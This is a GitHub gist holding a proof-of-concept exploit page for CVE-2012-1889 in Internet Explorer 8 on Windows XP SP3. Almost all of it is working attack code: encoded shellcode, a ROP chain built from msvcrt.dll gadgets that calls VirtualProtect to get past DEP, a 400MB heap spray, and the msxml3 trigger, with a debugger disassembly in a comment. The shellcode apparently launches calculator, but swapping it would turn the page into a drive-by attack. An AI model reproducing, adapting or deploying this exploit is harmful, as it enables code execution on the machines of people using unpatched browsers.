Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
<html>
<head>
<title>IE8 CVE-2012-1889 BypassDEP Stable PoC</title>
</head>
<body>
<!--
Tested: WinXP 5.1.2600 Service Pack 3 Build 2600 IE8
Create: 2017-04-25, evi1m0.bat[at]gmail.com
msxml3!_dispatchImpl::InvokeHelper+0x9c:
037dd75a ff7528 push dword ptr [ebp+28h]
037dd75d 8b08 mov ecx,dword ptr [eax]
037dd75f ff7524 push dword ptr [ebp+24h]
037dd762 ff7520 push dword ptr [ebp+20h]
037dd765 57 push edi
037dd766 6a03 push 3
037dd768 ff7514 push dword ptr [ebp+14h]
037dd76b 68f8a77d03 push offset msxml3!GUID_NULL (037da7f8)
037dd770 53 push ebx
037dd771 50 push eax
037dd772 ff5118 call dword ptr [ecx+18h] // <<<
037dd775 89450c mov dword ptr [ebp+0Ch],eax
037dd778 8b06 mov eax,dword ptr [esi]
037dd77a 56 push esi
037dd77b ff5008 call dword ptr [eax+8] // <<<
037dd77e eb79 jmp msxml3!_dispatchImpl::InvokeHelper+0x13b (037dd7f9)
-->
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>
<script>
var shellcode = unescape("%u16eb%u315b%u50c0%ubb53%u23ad"+
"%u7c86%ud3ff%uc031%ubb50%ucafa%u7c81%ud"+
"3ff%ue5e8%uffff%u63ff%u6c61%u2e63%u7865"+
"%u0065");
var rop_chain = unescape(
// Rop Stackpivot
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
"%u5ED5%u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
"%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
// Mana VirtualProtect
"%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
"%ubc13%u77be" + // 0x77bebc13 # skip 4 bytes [msvcrt.dll]
"%u5515%u77c0" + // 0x77c05515 # POP EBX # RETN [msvcrt.dll]
"%u0201%u0000" + // 0x00000201 # 0x00000201-> ebx
"%u0cb3%u77c2" + // 0x77c20cb3 # POP EDX # RETN [msvcrt.dll]
"%u0040%u0000" + // 0x00000040 # 0x00000040-> edx
"%u09ea%u77c1" + // 0x77c109ea # POP ECX # RETN [msvcrt.dll]
"%ufa05%u77c2" + // 0x77c2fa05 # &Writable location [msvcrt.dll]
"%u7a41%u77c1" + // 0x77c17a41 # POP EDI # RETN [msvcrt.dll]
"%u6101%u77c1" + // 0x77c16101 # RETN (ROP NOP) [msvcrt.dll]
"%u9dd4%u77c0" + // 0x77c09dd4 # POP ESI # RETN [msvcrt.dll]
"%uaacc%u77bf" + // 0x77bfaacc # JMP [EAX] [msvcrt.dll]
"%u1d16%u77bf" + // 0x77bf1d16 # POP EAX # RETN [msvcrt.dll]
"%u1131%u77be" + // 0x77be1120 # 0x20-0xEF&VirtualProtect() [IAT msvcrt.dll]
"%u67f0%u77c2" + // 0x77c267f0 # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
"%u1025%u77c2" + // 0x77c21025 # ptr to 'push esp # ret ' [msvcrt.dll]
"");
// HeapSpray 400MB
var fill = "\u0c0c\u0c0c";
while (fill.length < 0x1000) fill += fill;
padding = fill.substring(0, 0x5F6);
evilcode = padding + rop_chain + shellcode;
evilcode += fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
while (evilcode.length < 0x100000) evilcode += evilcode;
var block = evilcode.substring(2, 0x100000 - 0x21);
var slide = new Array();
for (var i = 0; i < 400; i++){
slide[i] = block.substring(0, block.length);
}
alert("Allocated!");
// 0c0c0c08
var obj = document.getElementById('poc').object;
var src = unescape("%u0c08%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
obj.definition(0);
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment